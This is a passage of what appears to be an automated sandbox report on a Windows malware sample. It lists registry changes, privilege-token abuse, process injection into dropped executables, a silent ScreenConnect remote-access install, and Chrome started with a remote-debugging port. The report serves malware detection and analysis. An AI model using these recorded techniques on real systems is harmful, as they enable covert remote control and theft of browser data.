Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 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 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 N/A N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A N/A N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" N/A N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" N/A N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" N/A N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133851043978588988" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1\Full C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Version = "402915332" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductIcon = "C:\\Windows\\Installer\\{933D173F-6496-0F7D-53C4-FF46268B901A}\\DefaultIcon" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsClient.exe\" \"%1\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\URL Protocol C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\UseOriginalUrlEncoding = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductName = "ScreenConnect Client (3be09d9e5e840c20)" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\ = "ScreenConnect Client (3be09d9e5e840c20) Credential Provider" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsCredentialProvider.dll" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\PackageCode = "F371D3396946D7F0354CFF6462B809A1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1264 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe
PID 1920 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe
PID 2000 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1920 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe
PID 1264 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe
PID 3444 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 5072 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 3444 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe
PID 4852 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 2192 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4480 wrote to memory of 4036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe

"C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5072 -ip 5072

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 960

C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe

"C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffb9ca0cc40,0x7ffb9ca0cc4c,0x7ffb9ca0cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1876,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1872 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2180,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2284 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2320 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3236,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3248 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3488,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3296 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3232,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3664 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,1565203034049384195,8608712830261209098,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4680 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

